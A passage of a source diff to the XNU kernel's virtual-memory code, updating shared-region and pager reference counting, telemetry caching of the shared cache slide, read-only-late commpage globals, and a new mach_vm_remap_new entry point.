- */ -ipc_port_t -vm_shared_region_mem_entry( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> mem_entry(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: mem_entry(%p) <- %p\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (void *)VM_KERNEL_ADDRPERM(shared_region->sr_mem_entry))); - return shared_region->sr_mem_entry; -} - vm_map_t vm_shared_region_vm_map( vm_shared_region_t shared_region) @@ -324,7 +262,7 @@ vm_shared_region_vm_map( SHARED_REGION_TRACE_DEBUG( ("shared_region: -> vm_map(%p)\n", (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); sr_handle = shared_region->sr_mem_entry; sr_mem_entry = (vm_named_entry_t) ip_get_kobject(sr_handle); @@ -619,6 +557,11 @@ vm_shared_region_deallocate( } else { /* timer expired: let go of this shared region */ + /* Make sure there's no cached pointer to the region. */ + if (primary_system_shared_region == shared_region) { + primary_system_shared_region = NULL; + } + /* * Remove it from the queue first, so no one can find * it... @@ -977,11 +920,13 @@ vm_shared_region_destroy( /* * Gets the address of the first (in time) mapping in the shared region. + * If used during initial task setup by dyld, task should non-NULL. */ kern_return_t vm_shared_region_start_address( vm_shared_region_t shared_region, - mach_vm_offset_t *start_address) + mach_vm_offset_t *start_address, + task_t task) { kern_return_t kr; mach_vm_offset_t sr_base_address; @@ -990,7 +935,6 @@ vm_shared_region_start_address( SHARED_REGION_TRACE_DEBUG( ("shared_region: -> start_address(%p)\n", (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); vm_shared_region_lock(); @@ -1001,12 +945,11 @@ vm_shared_region_start_address( */ while (shared_region->sr_mapping_in_progress) { /* wait for our turn... 
*/ - assert(shared_region->sr_ref_count > 1); vm_shared_region_sleep(&shared_region->sr_mapping_in_progress, THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); sr_base_address = shared_region->sr_base_address; sr_first_mapping = shared_region->sr_first_mapping; @@ -1020,8 +963,23 @@ vm_shared_region_start_address( } + uint32_t slide = shared_region->sr_slide; + vm_shared_region_unlock(); + /* + * Cache shared region info in the task for telemetry gathering, if we're + * passed in the task. No task lock here as we're still in intial task set up. + */ + if (kr == KERN_SUCCESS && task != NULL && task->task_shared_region_slide == -1) { + uint_t sc_header_uuid_offset = offsetof(struct _dyld_cache_header, uuid); + if (copyin((user_addr_t)(*start_address + sc_header_uuid_offset), + (char *)&task->task_shared_region_uuid, + sizeof(task->task_shared_region_uuid)) == 0) { + task->task_shared_region_slide = slide; + } + } + SHARED_REGION_TRACE_DEBUG( ("shared_region: start_address(%p) <- 0x%llx\n", (void *)VM_KERNEL_ADDRPERM(shared_region), @@ -1105,7 +1063,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr) vm_shared_region_sleep(&sr->sr_mapping_in_progress, THREAD_UNINT); } assert(!sr->sr_mapping_in_progress); - assert(sr->sr_ref_count > 1); + assert(sr->sr_ref_count > 0); /* Just return if already done. */ if (task->shared_region_auth_remapped) { @@ -1157,8 +1115,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr) /* * Check that the object exactly covers the region to slide. 
*/ - if (VME_OFFSET(tmp_entry) != si->si_start || - tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) { + if (tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) { kr = KERN_FAILURE; goto done; } @@ -1251,7 +1208,7 @@ vm_shared_region_undo_mappings( vm_named_entry_t sr_mem_entry; vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); while (shared_region->sr_mapping_in_progress) { /* wait for our turn... */ @@ -1259,7 +1216,7 @@ vm_shared_region_undo_mappings( THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* let others know we're working in this shared region */ shared_region->sr_mapping_in_progress = TRUE; @@ -1319,7 +1276,7 @@ vm_shared_region_undo_mappings( if (reset_shared_region_state) { vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); assert(shared_region->sr_mapping_in_progress); /* we're done working on that shared region */ shared_region->sr_mapping_in_progress = FALSE; @@ -1332,10 +1289,11 @@ vm_shared_region_undo_mappings( } /* - * For now we only expect to see at most 2 regions to relocate/authenticate - * per file. One that's VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. + * For now we only expect to see at most 4 regions to relocate/authenticate + * per file. One that's RW VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. + * And then RO VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. */ -#define VMSR_NUM_SLIDES 2 +#define VMSR_NUM_SLIDES 4 /* * First part of vm_shared_region_map_file(). 
Split out to @@ -1379,7 +1337,7 @@ vm_shared_region_map_file_setup( unsigned int current_file_index = 0; vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* * Make sure we handle only one mapping at a time in a given @@ -1392,7 +1350,7 @@ vm_shared_region_map_file_setup( THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* let others know we're working in this shared region */ shared_region->sr_mapping_in_progress = TRUE; @@ -1726,7 +1684,10 @@ vm_shared_region_map_file( mach_vm_offset_t sfm_max_address = 0; vm_map_t sr_map = NULL; vm_map_offset_t lowest_unnestable_addr = 0; - mach_vm_offset_t file_first_mappings[VMSR_NUM_SLIDES] = {(mach_vm_offset_t) -1, (mach_vm_offset_t) -1}; + mach_vm_offset_t file_first_mappings[VMSR_NUM_SLIDES]; + for (i = 0; i < VMSR_NUM_SLIDES; ++i) { + file_first_mappings[i] = (mach_vm_offset_t) -1; + } kr = vm_shared_region_map_file_setup(shared_region, sr_file_mappings_count, sr_file_mappings, &mappings_to_slide_cnt, &mappings_to_slide[0], slid_mappings, slid_file_controls, @@ -1776,7 +1737,7 @@ vm_shared_region_map_file( } vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); assert(shared_region->sr_mapping_in_progress); /* set "sr_first_mapping"; dyld uses it to validate the shared cache */ @@ -1806,6 +1767,13 @@ done: } #endif /* __has_feature(ptrauth_calls) */ + /* Cache shared region info needed for telemetry in the task */ + task_t task; + if (kr == KERN_SUCCESS && (task = current_task())->task_shared_region_slide == -1) { + mach_vm_offset_t start_address; + (void)vm_shared_region_start_address(shared_region, &start_address, task); + } + SHARED_REGION_TRACE_DEBUG( ("shared_region: map(%p) <- 0x%x \n", (void *)VM_KERNEL_ADDRPERM(shared_region), kr)); @@ -1829,6 +1797,7 @@ vm_shared_region_map_file_final( int error; 
size_t image_array_length; struct _dyld_cache_image_text_info *sr_image_layout; + boolean_t locally_built = FALSE; /* @@ -1844,6 +1813,7 @@ vm_shared_region_map_file_final( if (error == 0) { memcpy(&shared_region->sr_uuid, &sr_cache_header.uuid, sizeof(shared_region->sr_uuid)); shared_region->sr_uuid_copied = TRUE; + locally_built = sr_cache_header.locallyBuiltCache; } else { #if DEVELOPMENT || DEBUG panic("shared_region: copyin shared_cache_header(sr_base_addr:0x%016llx sr_first_mapping:0x%016llx " @@ -1858,19 +1828,27 @@ vm_shared_region_map_file_final( } /* - * If the shared cache is associated with the init task (and is therefore the system shared cache), - * check whether it is a custom built shared cache and copy in the shared cache layout accordingly. + * We save a pointer to the shared cache mapped by the "init task", i.e. launchd. This is used by + * the stackshot code to reduce output size in the common case that everything maps the same shared cache. + * One gotcha is that "userspace reboots" can occur which can cause a new shared region to be the primary + * region. In that case, launchd re-exec's itself, so we may go through this path multiple times. We + * let the most recent one win. + * + * Check whether the shared cache is a custom built one and copy in the shared cache layout accordingly. 
*/ - boolean_t is_init_task = (task_pid(current_task()) == 1); + bool is_init_task = (task_pid(current_task()) == 1); if (shared_region->sr_uuid_copied && is_init_task) { /* Copy in the shared cache layout if we're running with a locally built shared cache */ - if (sr_cache_header.locallyBuiltCache) { + if (locally_built) { KDBG((MACHDBG_CODE(DBG_MACH_SHAREDREGION, PROCESS_SHARED_CACHE_LAYOUT)) | DBG_FUNC_START); image_array_length = (size_t)(sr_cache_header.imagesTextCount * sizeof(struct _dyld_cache_image_text_info)); sr_image_layout = kheap_alloc(KHEAP_DATA_BUFFERS, image_array_length, Z_WAITOK); error = copyin((user_addr_t)(shared_region->sr_base_address + shared_region->sr_first_mapping + sr_cache_header.imagesTextOffset), (char *)sr_image_layout, image_array_length); if (error == 0) { + if (sr_cache_header.imagesTextCount >= UINT32_MAX) { + panic("shared_region: sr_cache_header.imagesTextCount >= UINT32_MAX"); + } shared_region->sr_images = kalloc((vm_size_t)(sr_cache_header.imagesTextCount * sizeof(struct dyld_uuid_info_64))); for (size_t index = 0; index < sr_cache_header.imagesTextCount; index++) { memcpy((char *)&shared_region->sr_images[index].imageUUID, (char *)&sr_image_layout[index].uuid, @@ -1878,7 +1856,6 @@ vm_shared_region_map_file_final( shared_region->sr_images[index].imageLoadAddress = sr_image_layout[index].loadAddress; } - assert(sr_cache_header.imagesTextCount < UINT32_MAX); shared_region->sr_images_count = (uint32_t) sr_cache_header.imagesTextCount; } else { #if DEVELOPMENT || DEBUG @@ -1895,7 +1872,7 @@ vm_shared_region_map_file_final( kheap_free(KHEAP_DATA_BUFFERS, sr_image_layout, image_array_length); sr_image_layout = NULL; } - init_task_shared_region = shared_region; + primary_system_shared_region = shared_region; } /* @@ -2984,22 +2961,22 @@ vm_shared_region_slide_page( /* Comm page support */ /******************************************************************************/ -ipc_port_t commpage32_handle = IPC_PORT_NULL; -ipc_port_t 
commpage64_handle = IPC_PORT_NULL; -vm_named_entry_t commpage32_entry = NULL; -vm_named_entry_t commpage64_entry = NULL; -vm_map_t commpage32_map = VM_MAP_NULL; -vm_map_t commpage64_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage32_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage64_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage32_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage64_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage32_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage64_map = VM_MAP_NULL; -ipc_port_t commpage_text32_handle = IPC_PORT_NULL; -ipc_port_t commpage_text64_handle = IPC_PORT_NULL; -vm_named_entry_t commpage_text32_entry = NULL; -vm_named_entry_t commpage_text64_entry = NULL; -vm_map_t commpage_text32_map = VM_MAP_NULL; -vm_map_t commpage_text64_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text32_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text64_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text32_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text64_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text32_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text64_map = VM_MAP_NULL; -user32_addr_t commpage_text32_location = 0; -user64_addr_t commpage_text64_location = 0; +SECURITY_READ_ONLY_LATE(user32_addr_t) commpage_text32_location = 0; +SECURITY_READ_ONLY_LATE(user64_addr_t) commpage_text64_location = 0; #if defined(__i386__) || defined(__x86_64__) /* @@ -3098,11 +3075,11 @@ vm_commpage_init(void) /* populate them according to this specific platform */ commpage_populate(); __commpage_setup = 1; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (__system_power_source == 0) { post_sys_powersource_internal(0, 1); } -#endif +#endif /* XNU_TARGET_OS_OSX */ SHARED_REGION_TRACE_DEBUG( ("commpage: init() <-\n")); @@ -3322,11 +3299,11 
@@ vm_shared_region_slide( sr->sr_slide_in_progress = FALSE; thread_wakeup(&sr->sr_slide_in_progress); -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (error == KERN_SUCCESS) { shared_region_completed_slide = TRUE; } -#endif +#endif /* XNU_TARGET_OS_OSX */ vm_shared_region_unlock(); vm_shared_region_deallocate(sr); @@ -3449,19 +3426,19 @@ vm_shared_region_is_reslide(__unused struct task *task) * 1 if it is internal power source ie battery */ void -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX post_sys_powersource(int i) -#else +#else /* XNU_TARGET_OS_OSX */ post_sys_powersource(__unused int i) -#endif +#endif /* XNU_TARGET_OS_OSX */ { -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX post_sys_powersource_internal(i, 0); -#endif +#endif /* XNU_TARGET_OS_OSX */ } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static void post_sys_powersource_internal(int i, int internal) { @@ -3469,7 +3446,7 @@ post_sys_powersource_internal(int i, int internal) __system_power_source = i; } } -#endif +#endif /* XNU_TARGET_OS_OSX */ void * vm_shared_region_root_dir( diff --git a/osfmk/vm/vm_shared_region.h b/osfmk/vm/vm_shared_region.h index cc76069a0..bfe868241 100644 --- a/osfmk/vm/vm_shared_region.h +++ b/osfmk/vm/vm_shared_region.h @@ -58,7 +58,7 @@ extern int shared_region_debug; extern int shared_region_trace_level; -extern struct vm_shared_region *init_task_shared_region; +extern struct vm_shared_region *primary_system_shared_region; #define SHARED_REGION_TRACE_NONE_LVL 0 /* no trace */ #define SHARED_REGION_TRACE_ERROR_LVL 1 /* trace abnormal events */ @@ -276,12 +276,6 @@ extern vm_shared_region_t vm_shared_region_trim_and_get( struct task *task); extern void vm_shared_region_deallocate( struct vm_shared_region *shared_region); -extern mach_vm_offset_t vm_shared_region_base_address( - struct vm_shared_region *shared_region); -extern mach_vm_size_t vm_shared_region_size( - struct vm_shared_region *shared_region); -extern ipc_port_t vm_shared_region_mem_entry( - struct 
vm_shared_region *shared_region); extern vm_map_t vm_shared_region_vm_map( struct vm_shared_region *shared_region); extern void vm_shared_region_set( @@ -295,7 +289,8 @@ extern vm_shared_region_t vm_shared_region_lookup( boolean_t reslide); extern kern_return_t vm_shared_region_start_address( struct vm_shared_region *shared_region, - mach_vm_offset_t *start_address); + mach_vm_offset_t *start_address, + task_t task); extern void vm_shared_region_undo_mappings( vm_map_t sr_map, mach_vm_offset_t sr_base_address, diff --git a/osfmk/vm/vm_shared_region_pager.c b/osfmk/vm/vm_shared_region_pager.c index 3a1bb8fc9..3af00d602 100644 --- a/osfmk/vm/vm_shared_region_pager.c +++ b/osfmk/vm/vm_shared_region_pager.c @@ -291,11 +291,15 @@ done: * the "shared_region" EMM. */ typedef struct shared_region_pager { - struct memory_object srp_header; /* mandatory generic header */ + struct memory_object srp_header; /* mandatory generic header */ /* pager-specific data */ queue_chain_t srp_queue; /* next & prev pagers */ - uint32_t srp_ref_count; /* active uses */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define srp_ref_count srp_header.mo_ref +#else + os_ref_atomic_t srp_ref_count; /* active uses */ +#endif bool srp_is_mapped; /* has active mappings */ bool srp_is_ready; /* is this pager ready? 
*/ vm_object_t srp_backing_object; /* VM object for shared cache */ @@ -520,7 +524,7 @@ shared_region_pager_data_request( pager = shared_region_pager_lookup(mem_obj); assert(pager->srp_is_ready); - assert(pager->srp_ref_count > 1); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 1); /* pager is alive */ assert(pager->srp_is_mapped); /* pager is mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("shared_region_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -545,7 +549,7 @@ shared_region_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); /* @@ -842,8 +846,7 @@ shared_region_pager_reference( pager = shared_region_pager_lookup(mem_obj); lck_mtx_lock(&shared_region_pager_lock); - assert(pager->srp_ref_count > 0); - pager->srp_ref_count++; + os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); lck_mtx_unlock(&shared_region_pager_lock); } @@ -890,7 +893,7 @@ shared_region_pager_terminate_internal( { assert(pager->srp_is_ready); assert(!pager->srp_is_mapped); - assert(pager->srp_ref_count == 1); + assert(os_ref_get_count_raw(&pager->srp_ref_count) == 1); if (pager->srp_backing_object != VM_OBJECT_NULL) { vm_object_deallocate(pager->srp_backing_object); @@ -914,6 +917,7 @@ shared_region_pager_deallocate_internal( { boolean_t needs_trimming; int count_unmapped; + os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&shared_region_pager_lock); @@ -924,10 +928,9 @@ shared_region_pager_deallocate_internal( needs_trimming = (count_unmapped > shared_region_pager_cache_limit); /* drop a reference on this pager */ - assert(pager->srp_ref_count > 0); - pager->srp_ref_count--; + ref_count = os_ref_release_locked_raw(&pager->srp_ref_count, NULL); - if (pager->srp_ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is 
really holding on to this pager anymore. @@ -937,7 +940,7 @@ shared_region_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&shared_region_pager_lock); shared_region_pager_terminate_internal(pager); - } else if (pager->srp_ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. Do some final cleanup and release the @@ -1052,10 +1055,10 @@ shared_region_pager_map( lck_mtx_lock(&shared_region_pager_lock); assert(pager->srp_is_ready); - assert(pager->srp_ref_count > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); /* pager is alive */ if (!pager->srp_is_mapped) { pager->srp_is_mapped = TRUE; - pager->srp_ref_count++; + os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); shared_region_pager_count_mapped++; } lck_mtx_unlock(&shared_region_pager_lock); @@ -1133,7 +1136,7 @@ shared_region_pager_lookup( assert(mem_obj->mo_pager_ops == &shared_region_pager_ops); pager = (shared_region_pager_t)(uintptr_t) mem_obj; - assert(pager->srp_ref_count > 0); + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); return pager; } @@ -1173,8 +1176,8 @@ shared_region_pager_create( pager->srp_header.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->srp_is_ready = FALSE;/* not ready until it has a "name" */ - pager->srp_ref_count = 1; /* existence reference (for the cache) */ - pager->srp_ref_count++; /* for the caller */ + /* existence reference (for the cache) + 1 for the caller */ + os_ref_init_count_raw(&pager->srp_ref_count, NULL, 2); pager->srp_is_mapped = FALSE; pager->srp_backing_object = backing_object; pager->srp_backing_offset = backing_offset; @@ -1318,7 +1321,8 @@ shared_region_pager_match( if (memcmp(si->si_slide_info_entry, slide_info->si_slide_info_entry, si->si_slide_info_size) != 0) { continue; } - ++pager->srp_ref_count; /* the caller expects a reference on this */ + /* the caller expects a reference on this */ + 
os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); lck_mtx_unlock(&shared_region_pager_lock); return (memory_object_t)pager; } @@ -1366,7 +1370,7 @@ shared_region_pager_trim(void) /* get prev elt before we dequeue */ prev_pager = (shared_region_pager_t)queue_prev(&pager->srp_queue); - if (pager->srp_ref_count == 2 && + if (os_ref_get_count_raw(&pager->srp_ref_count) == 2 && pager->srp_is_ready && !pager->srp_is_mapped) { /* this pager can be trimmed */ @@ -1401,13 +1405,13 @@ shared_region_pager_trim(void) srp_queue); pager->srp_queue.next = NULL; pager->srp_queue.prev = NULL; - assert(pager->srp_ref_count == 2); + assert(os_ref_get_count_raw(&pager->srp_ref_count) == 2); /* * We can't call deallocate_internal() because the pager * has already been dequeued, but we still need to remove * a reference. */ - pager->srp_ref_count--; + (void)os_ref_release_locked_raw(&pager->srp_ref_count, NULL); shared_region_pager_terminate_internal(pager); } } diff --git a/osfmk/vm/vm_swapfile_pager.c b/osfmk/vm/vm_swapfile_pager.c index 388d0fb56..677b2b0ce 100644 --- a/osfmk/vm/vm_swapfile_pager.c +++ b/osfmk/vm/vm_swapfile_pager.c @@ -137,13 +137,17 @@ const struct memory_object_pager_ops swapfile_pager_ops = { */ typedef struct swapfile_pager { /* mandatory generic header */ - struct memory_object swp_pgr_hdr; + struct memory_object swp_pgr_hdr; /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - unsigned int ref_count; /* reference count */ - boolean_t is_ready; /* is this pager ready ? */ - boolean_t is_mapped; /* is this pager mapped ? */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define swp_pgr_hdr_ref swp_pgr_hdr.mo_ref +#else + os_ref_atomic_t swp_pgr_hdr_ref; /* reference count */ +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this pager mapped ? 
*/ struct vnode *swapfile_vnode;/* the swapfile's vnode */ } *swapfile_pager_t; #define SWAPFILE_PAGER_NULL ((swapfile_pager_t) NULL) @@ -320,7 +324,7 @@ swapfile_pager_data_request( pager = swapfile_pager_lookup(mem_obj); assert(pager->is_ready); - assert(pager->ref_count > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("swapfile_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -344,7 +348,7 @@ swapfile_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); @@ -482,8 +486,7 @@ swapfile_pager_reference( pager = swapfile_pager_lookup(mem_obj); lck_mtx_lock(&swapfile_pager_lock); - assert(pager->ref_count > 0); - pager->ref_count++; + os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL); lck_mtx_unlock(&swapfile_pager_lock); } @@ -552,14 +555,16 @@ swapfile_pager_deallocate_internal( swapfile_pager_t pager, boolean_t locked) { + os_ref_count_t ref_count; + if (!locked) { lck_mtx_lock(&swapfile_pager_lock); } /* drop a reference on this pager */ - pager->ref_count--; + ref_count = os_ref_release_locked_raw(&pager->swp_pgr_hdr_ref, NULL); - if (pager->ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is really holding on to this pager anymore. @@ -569,7 +574,7 @@ swapfile_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&swapfile_pager_lock); swapfile_pager_terminate_internal(pager); - } else if (pager->ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. 
Do some final cleanup and release the @@ -657,7 +662,7 @@ swapfile_pager_map( lck_mtx_lock(&swapfile_pager_lock); assert(pager->is_ready); - assert(pager->ref_count > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -665,7 +670,7 @@ swapfile_pager_map( * are removed. */ pager->is_mapped = TRUE; - pager->ref_count++; + os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL); } lck_mtx_unlock(&swapfile_pager_lock); @@ -716,7 +721,7 @@ swapfile_pager_lookup( assert(mem_obj->mo_pager_ops == &swapfile_pager_ops); __IGNORE_WCASTALIGN(pager = (swapfile_pager_t) mem_obj); - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); return pager; } @@ -745,7 +750,7 @@ swapfile_pager_create( pager->swp_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->is_ready = FALSE;/* not ready until it has a "name" */ - pager->ref_count = 1; /* setup reference */ + os_ref_init_raw(&pager->swp_pgr_hdr_ref, NULL); /* setup reference */ pager->is_mapped = FALSE; pager->swapfile_vnode = vp; @@ -762,7 +767,7 @@ swapfile_pager_create( if (!queue_end(&swapfile_pager_queue, (queue_entry_t) pager2)) { /* while we hold the lock, transfer our setup ref to winner */ - pager2->ref_count++; + os_ref_retain_locked_raw(&pager2->swp_pgr_hdr_ref, NULL); /* we lost the race, down with the loser... 
*/ lck_mtx_unlock(&swapfile_pager_lock); pager->swapfile_vnode = NULL; @@ -831,7 +836,7 @@ swapfile_pager_setup( pager = SWAPFILE_PAGER_NULL; } else { /* make sure pager doesn't disappear */ - pager->ref_count++; + os_ref_retain_raw(&pager->swp_pgr_hdr_ref, NULL); } lck_mtx_unlock(&swapfile_pager_lock); diff --git a/osfmk/vm/vm_tests.c b/osfmk/vm/vm_tests.c index cda7e0ba1..6e288f8c7 100644 --- a/osfmk/vm/vm_tests.c +++ b/osfmk/vm/vm_tests.c @@ -892,17 +892,19 @@ vm_test_map_copy_adjust_to_target(void) mach_memory_entry_port_release(mem_entry); /* create 4k copy map */ + curprot = VM_PROT_NONE; + maxprot = VM_PROT_NONE; kr = vm_map_copy_extract(map4k, addr4k, 0x3000, - VM_PROT_READ, FALSE, - &copy4k, &curprot, &maxprot, + FALSE, &copy4k, &curprot, &maxprot, VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE); assert(kr == KERN_SUCCESS); assert(copy4k->size == 0x3000); /* create 16k copy map */ + curprot = VM_PROT_NONE; + maxprot = VM_PROT_NONE; kr = vm_map_copy_extract(map16k, addr16k, 0x4000, - VM_PROT_READ, FALSE, - &copy16k, &curprot, &maxprot, + FALSE, &copy16k, &curprot, &maxprot, VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE); assert(kr == KERN_SUCCESS); assert(copy16k->size == 0x4000); diff --git a/osfmk/vm/vm_user.c b/osfmk/vm/vm_user.c index 360289f47..2682dfaaf 100644 --- a/osfmk/vm/vm_user.c +++ b/osfmk/vm/vm_user.c @@ -1184,6 +1184,91 @@ vm_map_kernel( return kr; } +/* + * mach_vm_remap_new - + * Behaves like mach_vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set + * and {cur,max}_protection are in/out. 
+ */ +kern_return_t +mach_vm_remap_new_external( + vm_map_t target_map, + mach_vm_offset_t *address, + mach_vm_size_t size, + mach_vm_offset_t mask, + int flags, + mach_port_t src_tport, + mach_vm_offset_t memory_address, + boolean_t copy, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ + vm_inherit_t inheritance) +{ + vm_tag_t tag; + vm_map_offset_t map_addr; + kern_return_t kr; + vm_map_t src_map; + + flags |= VM_FLAGS_RETURN_DATA_ADDR; + VM_GET_FLAGS_ALIAS(flags, tag); + + /* filter out any kernel-only flags */ + if (flags & ~VM_FLAGS_USER_REMAP) { + return KERN_INVALID_ARGUMENT; + } + + if (target_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if ((*cur_protection & ~VM_PROT_ALL) || + (*max_protection & ~VM_PROT_ALL) || + (*cur_protection & *max_protection) != *cur_protection) { + return KERN_INVALID_ARGUMENT; + } + if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == + (VM_PROT_WRITE | VM_PROT_EXECUTE)) { + /* + * XXX FBDP TODO + * enforce target's "wx" policies + */ + return KERN_PROTECTION_FAILURE; + } + + if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) { + src_map = convert_port_to_map_read(src_tport); + } else { + src_map = convert_port_to_map(src_tport); + } + + if (src_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + map_addr = (vm_map_offset_t)*address; + + kr = vm_map_remap(target_map, + &map_addr, + size, + mask, + flags, + VM_MAP_KERNEL_FLAGS_NONE, + tag, + src_map, + memory_address, + copy, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ + inheritance); + + *address = map_addr; + vm_map_deallocate(src_map); + + if (kr == KERN_SUCCESS) { + ipc_port_release_send(src_tport); /* consume on success */ + } + return kr; +} + /* * mach_vm_remap - * Remap a range of memory from one task into another, @@ -1201,8 +1286,8 @@ mach_vm_remap_external( vm_map_t src_map, mach_vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - 
vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_tag_t tag; @@ -1223,8 +1308,8 @@ mach_vm_remap_kernel( vm_map_t src_map, mach_vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_map_offset_t map_addr; @@ -1241,6 +1326,9 @@ mach_vm_remap_kernel( map_addr = (vm_map_offset_t)*address; + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + kr = vm_map_remap(target_map, &map_addr, size, @@ -1251,13 +1339,98 @@ mach_vm_remap_kernel( src_map, memory_address, copy, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance); *address = map_addr; return kr; } +/* + * vm_remap_new - + * Behaves like vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set + * and {cur,max}_protection are in/out. 
